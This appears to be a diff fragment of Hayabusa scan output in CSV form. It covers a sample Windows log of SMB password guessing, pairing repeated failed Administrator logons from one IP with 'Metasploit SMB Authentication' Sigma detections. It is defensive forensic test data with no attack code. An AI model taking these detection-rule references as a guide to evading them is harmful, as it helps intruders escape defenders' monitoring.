+2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LXVWG3Yl0utv98Zf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VDfa0UebgleQMK5U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxTLJJsWs9dOc5JC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x7cKtymmsQJSM6zZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbtC0srNyvkIHOSV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wPGlJ6ZjGSfUKrCf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Uw95Ema8vWlRXKy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hHTrBmhkjGLTNt2R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJeRVGKULJIo76aa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Kipf0Z2Tse2eWoxa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bnP7tmMJXDVzIDim  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CBeMt62oqlIICShT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIfXRZQkKRJAw4er  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8wrqSJPALo5QtUnS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81Mm67AdwpPJMCMm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jwq5jXlMRU1SNLO5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d7OYj8ynCEl5dG9m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YzT8vF7ANYnjSRgd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m4eYIoww4uL6oYZu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DpO8L2Fky4zYwp2q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGmxSy48sphENTiY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tQVAkjteLFK0hbyE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UMWKsQ8l0j9fZPfA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ct7xYUYH9sr7mva  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GBn0XxaPOZQokJ0Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nQELRxrGuXqkYgO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5eT0mykgLNZQygq9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qMyIqRidF6oBdzog  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ULnnFcF98k9zpNTl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j5k02pcelZNGwF3u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qfcC6LqJqs0EeGjE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mXALYkkitmyAFq14  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zIqQmExq22WrW4md  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ydHqjdZhLMI9gjfj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMSe45VZNPdovPbq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hiHlcR6qNGE0P7TK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iT3jPdHr89RqPlyd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0QFnABeYK39XEntR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5plMYSBQi5mKmdlk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TaxWckQUCMgWvCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81xZ7iisEyTABmUm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qYiQ2xjMQFQwH2XY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eRN8e3yzZzxc2p3A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCa6PN0C7XznvipG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hFqjIXbEb7eWUFUi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkrVjLgnJZlIyXpk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
